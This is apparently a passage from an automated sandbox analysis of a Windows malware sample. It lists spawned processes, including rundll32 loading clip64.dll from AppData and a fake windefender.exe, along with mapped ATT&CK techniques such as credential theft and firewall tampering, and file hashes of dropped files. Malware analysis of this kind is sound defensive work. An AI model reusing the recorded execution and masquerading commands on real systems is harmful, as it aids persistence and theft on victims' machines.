C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main2⤵PID:5400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 572 -ip 5721⤵PID:3228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2432 -ip 24321⤵PID:3380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5920
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5940
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵PID:2824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1688 -ip 16881⤵PID:5388
-
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe1⤵PID:4744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k smphost1⤵PID:3144
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:3180
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Unsecured Credentials
6Credentials In Files
5Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
2KB
MD5ac4917a885cf6050b1a483e4bc4d2ea5
SHA1b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f
SHA256e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9
SHA512092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d
-
Filesize
19KB
MD5fe241559e1fc0ded0a7ff64d83f8c1f5
SHA1c2204c75f64df999a09baff69926e68d5241d758
SHA2566f011214ba515dae37b566b52eb82e5b0a27f02526a65ef3acc4e9d52513c0bf
SHA5124718804b45e4cd1fbfb49cc88bbf469e09e7b0f4e12797376d702cff0a74b8548be6c6658b2e216cc9007d6bac41e097e66bc4b055cbeff564592bcd09f3e2f8
-
Filesize
19KB
MD5de2d11684e2aab41417982ea1c9629bc
SHA135ebd61e35ef4871b51a7dbd698db7072be54c8b
SHA256225115cb1b1eed551dd8b9afd2d4ef2f8d965622d4d83ce9adda24586c817afd
SHA512a602801dd0e4492d092831c462764203a21153fd160905a86b5acc119be8e5837b703e949963faa8677a1837b06486da4695c63db519ed006ca08b26532decb2
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403311357331\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
Filesize2.5MB
MD520d293b9bf23403179ca48086ba88867
SHA1dedf311108f607a387d486d812514a2defbd1b9e
SHA256fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348
SHA5125d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403311357331\opera_package
Filesize103.9MB
MD5401c352990789be2f40fe8f9c5c7a5ac
SHA1d7c1e902487511d3f4e1a57abdee8a94d5483ed4
SHA256f62f4ebc7eca46d9cddfb02cc0305da5efdd6f3601fb0f53da555e19558869a3
SHA512efc6d4224e3721e91efb2ea8f4b74685cba607260c69d08eac26866c52b8127080a42799d9f76ab1661b8ca63c946fcf35dddf0a63ab3cd258ea44a27dd769c8
-
Filesize
1.8MB
MD584f8a62131b758731dac05c1b6ea9354
SHA19f4c86697c014d0188f21e27f631692a7c6416f8
SHA2569cda0811519068e7105a88e1fa7914172483639769f4088f49abb0ea8f2b53b7
SHA512074b47804c317445e206471d743791714a3bf83ea4f78181f57f0f3643f341bc912e67a78609feaa93fc7a2b46adbec2db1c0cceae323048f0f501fbad35fd89
-
Filesize
379KB
MD5b264fee6ed0c634983be2b7ea4f854e6
SHA1f125a58da078e64b0bccc7012e341eefbe67ed0b
SHA256b443e71c000e0750a88e821dfcc804c8357a5017c12fa3e71256c486d93c6362
SHA5120ee197acf5e2c46657ab85959baf5b3d194b28bc266c3dd1373a331654d7ab7b5abfe796910a6856d4833d26ddcbfa45a3d00a03664f349cc47c0f31dcfcc1ee
-
Filesize
3.1MB
MD5209e7f2f382fb29af2d2fccb11d02f7c
SHA12fe4741dde510b55e2331b7c402a3793fd995a5d
SHA2564153fcce5b2b9291dea07db84320ea9242bd46970b3bbe76732d117dc857fa57
SHA512ab654506b1c2763728dae14040c68207abe31361dbb34bcac79211058cb2596d053b6b29c55718fd4373f080aa72b7c30134a7c2f41f44cef4dc7df843abb49e
-
Filesize
1.7MB
MD585a15f080b09acace350ab30460c8996
SHA13fc515e60e4cfa5b3321f04a96c7fb463e4b9d02
SHA2563a2006bc835a8ffe91b9ee9206f630b3172f42e090f4e8d90be620e540f5ef6b
SHA512ade5e3531dfa1a01e6c2a69deb2962cbf619e766da3d6e8e3453f70ff55ccbcbe21381c7b97a53d67e1ca88975f4409b1a42a759e18f806171d29e4c3f250e9f
-
Filesize
1.8MB
MD54e457349ee8ddd67accfbdc724f89b37
SHA1905a0840203a6df2f6ed2375cd48d4c3f70c8cd8
SHA2568702b30de55c75700141ef035d824da5e53e6e3092c3cb0b0f8d28053f6be600
SHA512cdc2e4e5f84ba367bb70cb27a86901774d3c2ff447f7ba2b82c05d57d5bae26b09574135bfc92e22ee3550e268e554716bbb2b5ebbc7c01a4ec5fd5b66ac5e51
-
Filesize
301KB
MD5832eb4dc3ed8ceb9a1735bd0c7acaf1b
SHA1b622a406927fbb8f6cd5081bd4455fb831948fca
SHA2562a82243697e2eec45bedc754adcdc1f6f41724a40c6d7d96fd41ad144899b6f7
SHA5123ab8b25732a7152608be101a3daf0d55833c554ab968be8b3b79a49e1831f3ee0eeeb9586a3334fa387b1f160fd15e98a80dcfece559c9c257b44ef962874894
-
Filesize
499KB
MD583d0b41c7a3a0d29a268b49a313c5de5
SHA146f3251c771b67b40b1f3268caef8046174909a5
SHA25609cc3364d5e1c15228822926bc65ce290c487dc3b7c0345bf265538110fa9cc9
SHA512705ecc7c421338e37ed0d58c2d9fad03fb3565db422a0c9d895e75a399bf5f2a70cfe3ffdc860ffe010d4d1a213e0a844aeadb89ea8e0c830a2fc8c03b7669b5
-
Filesize
464KB
MD5c084d6f6ba40534fbfc5a64b21ef99ab
SHA10b4a17da83c0a8abbc8fab321931d5447b32b720
SHA256afd83290a2adb219c3f1b8fbf23c27b0994fe76dfbb7dc0b416530dc0e21f624
SHA512a5384a2f7029cf946fde44e1ff30775754ce525ca5a6fdac14184872b6e684cb6e585053cb86d32f82cbd3db48eb195ba3a642d8ee3774be579fccd993938ca1
-
Filesize
418KB
MD50099a99f5ffb3c3ae78af0084136fab3
SHA10205a065728a9ec1133e8a372b1e3864df776e8c
SHA256919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA5125ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6
-
Filesize
321KB
MD51c7d0f34bb1d85b5d2c01367cc8f62ef
SHA133aedadb5361f1646cffd68791d72ba5f1424114
SHA256e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c
SHA51253bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d
-
Filesize
4.6MB
MD5117176ddeaf70e57d1747704942549e4
SHA175e3ab6b3469d93cce9ea2f7e22b71b987ccdf2b
SHA2563c5b34de987116a4d3240e319c0da89a951c96b81e6705476a0fea27b22b20af
SHA512ca2a356929c92d314aab63d7f3b246d72783212dfa3a4507f28d41a51ca0eedc78e85b1cd453aa8e02c12509f847a0216bb702154f903291c804c8a98ec378b9
-
Filesize
2KB
MD51420d30f964eac2c85b2ccfe968eebce
SHA1bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA5126fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5408c69f2ff98ddd469e8973b4e143097
SHA18f20bc2e306474f7ca5f4f17b19e40edf1e22f98
SHA2562a561f9bda04cd7c0d453eaf900493e0639c371f715765d2960d38dfab504a39
SHA512b9dc96dd7b0927eb567c7451e92dab7cdf375bb6d7d1f6f12697f8f603e9addb6874ad1a3f8ddddb5c97e79c4f52a582b1a175ff40f12c80a5d55da28caa2a6c
-
Filesize
2KB
MD572c55ce7e61912fb593df1c843193e77
SHA193ba1a88b254b292d045a1dfa9c30612886bc64b
SHA25616d4d19b949a9cc343ddfdf19a48ef09279883229dd1eb78fc1eb17f2b82b130
SHA512c58cc88fb966ebbd0c56552d6e1b972d6a0dd804437c0af55af6677acea916e1154c0d61cfa1427ea8fea6fb18790883ba58d4b34d0897823c7d8433ba313cf8
-
Filesize
313KB
MD5ca6d78dc094bdaef68b4d211761cebaa
SHA1ac2ea19f4d1aef68f4dfed6c3d8cfaa1f6cd6718
SHA256cb127027cc214c9c58aedfea9371e5a29c9cb93359e8214ca98bf904e9dfd2e4
SHA51284a648063539b951b455eb32d3637dc31d25b38fdf046c5dcd09111e16483b1a243c19b612d8e7577663d148f079bb9651894b34d62eb35d47f4fb0c6d7829ef
-
Filesize
4.6MB
MD5397926927bca55be4a77839b1c44de6e
SHA1e10f3434ef3021c399dbba047832f02b3c898dbd
SHA2564f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954
-
Filesize
109KB
MD52afdbe3b99a4736083066a13e4b5d11a
SHA14d4856cf02b3123ac16e63d4a448cdbcb1633546
SHA2568d31b39170909595b518b1a03e9ec950540fabd545ed14817cac5c84b91599ee
SHA512d89b3c46854153e60e3fa825b394344eee33936d7dbf186af9d95c9adae54428609e3bf21a18d38fce3d96f3e0b8e4e0ed25cb5004fbe288de3aef3a85b1d93f
-
Filesize
1.2MB
MD592fbdfccf6a63acef2743631d16652a7
SHA1971968b1378dd89d59d7f84bf92f16fc68664506
SHA256b4588feacc183cd5a089f9bb950827b75df04bd5a6e67c95ff258e4a34aa0d72
SHA512b8ea216d4a59d8858fd4128abb555f8dcf3acca9138e663b488f09dc5200db6dc11ecc235a355e801145bbbb44d7beac6147949d75d78b32fe9cfd2fa200d117
-
Filesize
40B
MD588ad20f41f408c5213e1c45abaa8e12b
SHA1f64b3433becb486da7e87cfc52e7d8964d8ae016
SHA256c625ee0d39f2eb89d8e01b4932d41dc744907bb896e29aad603c7348d81e04b8
SHA512eb10735e3668f5f77b943a8861be3b90b21c8e2f3f5d900ccf9e9e0ca90a5c51165ad97635267da62b8b55fcebcd7990c29d473b4f2f0f218b25272ff89041fa
-
Filesize
109KB
MD5726cd06231883a159ec1ce28dd538699
SHA1404897e6a133d255ad5a9c26ac6414d7134285a2
SHA25612fef2d5995d671ec0e91bdbdc91e2b0d3c90ed3a8b2b13ddaa8ad64727dcd46
SHA5129ea82e7cb6c6a58446bd5033855947c3e2d475d2910f2b941235e0b96aa08eec822d2dd17cc86b2d3fce930f78b799291992408e309a6c63e3011266810ea83e
-
Filesize
1.2MB
MD515a42d3e4579da615a384c717ab2109b
SHA122aeedeb2307b1370cdab70d6a6b6d2c13ad2301
SHA2563c97bb410e49b11af8116feb7240b7101e1967cae7538418c45c3d2e072e8103
SHA5121eb7f126dccc88a2479e3818c36120f5af3caa0d632b9ea803485ee6531d6e2a1fd0805b1c4364983d280df23ea5ca3ad4a5fca558ac436efae36af9b795c444
-
Filesize
541KB
MD51fc4b9014855e9238a361046cfbf6d66
SHA1c17f18c8246026c9979ab595392a14fe65cc5e9f
SHA256f38c27ecbeed9721f0885d3b2f2f767d60a5d1c0a5c98433357f570987da3e50
SHA5122af234cac24ec4a508693d9affa7f759d4b29bb3c9ddffd9e6350959fd4da26501553399d2b02a8eeae8dace6bfe9b2ce50462ce3c6547497f5b0ea6ed226b12
-
Filesize
304KB
MD5cc90e3326d7b20a33f8037b9aab238e4
SHA1236d173a6ac462d85de4e866439634db3b9eeba3
SHA256bd73ee49a23901f9fb235f8a5b29adc72cc637ad4b62a9760c306900cb1678b7
SHA512b5d197a05a267bf66509b6d976924cd6f5963532a9f9f22d1763701d4fba3dfa971e0058388249409884bc29216fb33a51846562a5650f81d99ce14554861521
-
Filesize
2KB
MD5cddc91b9ca4ec46f875444c6abc55e8b
SHA177b51618dc8c245457d5c31e57b3c25114d20016
SHA25685d35b5e5f94dc661952090f4f07d3a907506513b01bfa81dcfb6bae751c73e5
SHA5123056182073e54d47c4daa8cf3f178273398d5c6f4ec63a39cca1010d53dd81c7927e3c403f0ea0ae585b20130227461fec0fe61f9533c141895b3abf8143d48b
-
Filesize
7KB
MD55b423612b36cde7f2745455c5dd82577
SHA10187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c
-
Filesize
3KB
MD5a8ed388f43d54b56bc582343d2c4764f
SHA197dd96b3ac1d80460b76f6427271970d5158e82b
SHA256414f51e48469b2160787e24133c936bff7690a15b624fa9efe320ab6c5444f44
SHA512035ccc9afd49639c3947f92cd7c0e5599eaa265fc63025daa535e101d74a2be950935ebe7d693f349da8d69c6010b801dc9a8df6c0e25f223aaa31019a82d5f9
-
Filesize
3KB
MD5871ad19435ecdb01ab262802491372d8
SHA172057d7200b4bd0d406f623081be241cba813322
SHA256592f1bc0b9d70cf733bfda3ce237bed31c9922fd5d34b3225daaf50259eb3a8f
SHA5126bc2266cb5007a48eab0914b5dc7946e79047166216000344edbdcb647ed80bddd4b7a7b514a1c626494bc7788ab2d76aeb39cfbcfddf7b4de3595089e750416
-
Filesize
5.1MB
MD5c45cd407ef6a6cc27dceebea02e3bbae
SHA1b91b33c661a3a0a7fc609c17e293537b3d3c5457
SHA2567da39bac5cfaee12163bf9aabdfca670de5a5ac08a53c0a89d9a736c6df27bd2
SHA5121dd3cd123bea317a88e04f8735b6bcdc9a1ef1e2b55863d659a8f516233557a41391121f07c7b5b5aa59363546b0234223c1845b539ecb822b23a5a1c3dc4c14
-
Filesize
4.2MB
MD50a63006c366404f6072d5be038fc5985
SHA1bff15dd74ed3b4420255e8c610ca1cc8cc5661f0
SHA256891526acf2ff954a77e29c29552a680737fe8bccc779115896a47897bcfbcbeb
SHA512ea0d6d9aaccade5fb7877216a3b531edb606c44d8a8bd832b8c78491bd654f5fa5c2b172bf3db4cb04cca7dfc09e8fba61d7c2f80a1907626a1d99e09288ce86
-
Filesize
4.2MB
MD57beb4838571dd3a719537c8e4b40db4a
SHA15d024fe83d6aa5eba77c02ece25c4ecadd767c8e
SHA256fbf9ca07dda938fce9c2782bb7bfe6f0462eedeeed715adfd38a2558f21b7d9c
SHA5126f92a729d436ce5abf751995f1f438d7ee5836fa481c5bcd6a4d136ff61d997f94d2cad3d9c6be36164c4944738b8e5b846e41f13f2890d9e251c0f1e904d39f
-
Filesize
6.2MB
MD5a53350f9e7ca22dfd9bc443c2ba6d440
SHA12b120ea5008f5e6df5a95d771dd2d256fc713f0f
SHA256448b14cd4e8322baf6774830784534faa4c43d36ef71d6fd930f81eed114dca4
SHA51267cdf73f4ee1b1d82f05e4e124576466ee27cd2a4ed1883a29c8d4d5d5df6346971c8ba6e51963e4504d2dcb6bec26859ea5779c8b8fbcc4067c03c913f8cdfe
-
Filesize
454KB
MD5a852771584d4840abc38a1c631405d95
SHA18611d1163ed5e54bd21fd963c6bd3da5779c5a40
SHA25636c126538569d67bca25102aaa41111aa0ee41baf2cd163ee5aaeaae2c6c58d5
SHA512c946f5a9c11b32400ab224b044e95b9fbb22513860974a20e93265a99827dc5a836cb25b5fb88cf1fab4dce5fa50a2de1fdd6b2f0b7b20888c68d7a9baff7ed6
-
Filesize
2KB
MD51419382c3cc5d2c4ecba3ada3672a774
SHA11138f3c9632d3f324672445ea0af1280cf6c9995
SHA25667e4f5e93399c42975d5298b066dac282b853331b452575906021d07b9684151
SHA512434547b7484843e97fb33c204cd463974639a945c074b59295fff4d9a0c1999a67dbb3c84ac6edfb1130df04de4d1c6437f28238a7cef2dfb8a47beb7188e533
-
Filesize
127B
MD58ef9853d1881c5fe4d681bfb31282a01
SHA1a05609065520e4b4e553784c566430ad9736f19f
SHA2569228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA5125ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005